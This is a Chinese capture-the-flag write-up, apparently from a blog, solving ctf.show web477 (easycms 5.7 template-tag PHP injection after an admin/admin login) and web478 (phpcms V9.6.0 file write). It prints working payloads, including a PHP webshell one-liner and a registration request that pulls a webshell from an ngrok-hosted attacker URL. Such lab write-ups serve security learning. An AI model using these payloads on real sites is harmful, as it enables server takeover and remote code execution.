web477

题目提示rce

是easycms的

去网站搜搜,搜到后台地址是admin.

弱口令admin admin登进去了

网上查了一下是5.7的版本,然后找一下漏洞

漏洞文件位置:/lib/table/table_templatetagwap.php 第3-20行:

 class table_templatetag extends table_mode {  function vaild() {  if(!front::post('name')) {  front::flash('请填写名称!');  return false;  }  if(!front::post('tagcontent')) {  front::flash('请填写内容!');  return false;  }  return true;  }  function save_before() {  if(!front::post('tagfrom')) front::$post['tagfrom']='define';  if(!front::post('attr1')) front::$post['attr1']='0';  if(front::$post['tagcontent']) front::$post['tagcontent'] =         htmlspecialchars_decode(front::$post['tagcontent']);  }
}

可以看到在写入文件之前,使用htmlsprcialchars_decode函数把预定义的html实体"<“和”>"大于转换为字符,因此我们可以使用双引号闭合,从而构造出payload写入文件,进一步触发代码,导致程序在现实上存在代码执行漏洞,攻击者可以通过构造恶意脚本代码写入配置文件,从而执行命令,控制网站服务器权限.

利用

  1. 登录后台,模板-自定义标签-添加自定义标签-填写payload-提交
111";<?php phpinfo()?>

​ 2.保存提交后,点击预览,成功触发代码,或者查看id的值,然后直接访问文件路径:

​ 3.使用别人的绕过过滤的一句话木马

11";}<?php assert($_POST[zf]);?>

但是发现连不上,可能存在过滤

上传一般一句话木马的时候有过滤,在phpinfo页面curl + f 查找下flag

web478

这里有提示安装地址哦

http://5a4353d3-1ab1-481f-87af-ff6ce895dd9b.challenge.ctf.show/install/install.php

phpcms v9

看看有没有逻辑漏洞

php版本

几个可写路径

填上数据库

后台

cms的具体版本Phpcms V9.6.0

就是你了

这里需要一个公网ip,我没有,这里使用代理工具ngrok

解压

加一下这里的授权码

开启代理

编辑一个txt文件在web服务中,并写入一句话木马

注册的时候抓包,将这个下面构造的放到info后面

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://5edc-112-38-217-12.ngrok.io/wanan.txt?.php#.jpg>&dosubmit=1&protocol=

把这个替换一下,测试直接发送burp抓到的是没办法执行的,鬼知道什么原因,等我有时间了在分析,反正就是该删的删

<img src=http://5edc-112-38-217-12.ngrok.io/wanan.txt?.php#.jpg>

回显了一个php文件

/wanan.txt?.php#.jpg>


[外链图片转存中...(img-qunovnrF-1661914134735)]回显了一个php文件[外链图片转存中...(img-rTmuJIXk-1661914134735)][外链图片转存中...(img-SSqGvlTS-1661914134735)]![image-20220331215658454](https://img-blog.csdnimg.cn/img_convert/6212d86c8b39ffff16f2cfd7801225bd.png)

ctf.showCMS(web477-web478)相关推荐

  1. 【CTF】实验吧 困在栅栏里的凯撒

    题目先提到栅栏,再提到凯撒,按照顺序先栅栏解码,再凯撒解码. 一般密码的开头不是flag就是key或者ctf 所以选择"6栏",在进行凯撒解码 在所有组合中,发现CTF即为flag

  2. 【CTF】实验吧 古典密码

    一共是35个字符分成5*7或者7*5 最终选择5行7列 首先变动第一行的位置,然后根据第一行变动的位置,依次变动下面的行 OCU{CFT ELXOUYD ECTNGAH OHRNFIE NM}IOTA ...

  3. 【CTF】实验吧 围在栅栏中的爱

    对摩斯密码进行解码:kiqlwtfcqgnsoo QWE是键盘上的前三个,ABC是26个字母的前三个.所以,二者有这样的对应关系. #include <stdio.h> #include ...

  4. 【CTF】实验吧 奇怪的短信

    和实验吧 The Flash-14有些类似,总共的数字数目是偶数,所以两两分开,题干中的"短信"是提示,观察两两分组的第二个数字没有超过四的,可以想到手机上的九键 例如第一组数:3 ...

  5. 【CTF】实验吧 The Flash-14

    标题的提示是:闪电侠的第十四集用到的加密方式(看来写CTF题要无所不知,不然咋能想到是一部剧) 根据两两一组将数据分类 54  43  32  52  22  44  55  34  22  51  ...

  6. 【CTF】实验吧 传统知识+古典密码

    对照顺序写下: 根据对应的干支得到 28 30 23 8 17 10 16 30   +甲子 所有的数加60 得到 88 90 83 68 77 70 76 90 找到ASCII码对照表可得到XZSD ...

  7. php upload ctf,强网杯CTF防御赛ez_upload Writeup

    这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...

  8. ctf 文件头crc错误_[CTF隐写]png中CRC检验错误的分析

    [CTF隐写]png中CRC检验错误的分析 最近接连碰到了3道关于png中CRC检验错误的隐写题,查阅了相关资料后学到了不少姿势,在这里做一个总结 题目来源: bugku-MISC-隐写2 bugku ...

  9. 所见所得php网页,Pwnium CTF之所见所得所想

    [TSRC编者按] 腾讯安全中心的年轻小伙伴们早就眼馋上次的BCTF比赛了,但是由于时间关系未能参加,十分遗憾.听说pwnium CTF比赛要开始了,于是他们摩拳擦掌,跃跃欲试.这不,他们牛刀小试,在 ...

最新文章

  1. 正余弦定理解三角形习题
  2. Struts1.x系列教程(20):使用EventDispatchAction类处理一个form多个submit
  3. DOCTYPE声明对JS获取窗口宽度和高度的影响【转】
  4. React Native升级目标SDK
  5. 【matlab-7】Matlab与线性代数(三)
  6. jQuery kxbdMarquee 无缝滚动
  7. Graham-Scan小总结——toj2317 Wall
  8. ASP.NET面试题(推荐_有答案)
  9. 高通模式9008模式linux,重磅干货!高通9008模式与数据提取
  10. 系统集成项目管理工程师10大管理5个过程组47个过程域
  11. 什么是指纹浏览器,修改浏览器指纹工具
  12. 【机器学习】PAC 学习理论
  13. 奔涌吧 后浪!!! 哔哩哔哩 何冰
  14. APISpace 让你快速获取名言警句
  15. jieba库基本介绍(中文分词)
  16. 光电耦合器电路应用符号
  17. 【Oracle】082基础知识
  18. 基于uni-app实现微信小程序一键登录和退出登录功能
  19. 第一周 平面点的对称点
  20. win7系统扩展双屏幕时,怎样在两个屏幕下都显示任务栏

热门文章

  1. 详细了解java中的null_深入理解java中的null“类型”
  2. 对一级标题二级标题进行排序
  3. Python 处理POS标签
  4. PHP程序输入输出流
  5. matlab变量及操作
  6. 读书笔记 - 《战天京》
  7. 搭建Aqours Online Judge的琐琐碎碎(一)Presentation Error判定
  8. 90后,是被逼创业的,大家觉得呢?
  9. 模式识别 计算机博弈,六子棋计算机博弈及其系统的研究与优化
  10. facebook网页版登录_微信网页版关闭登录将影响一大批使用itchat等Web Api方案的微信机器人...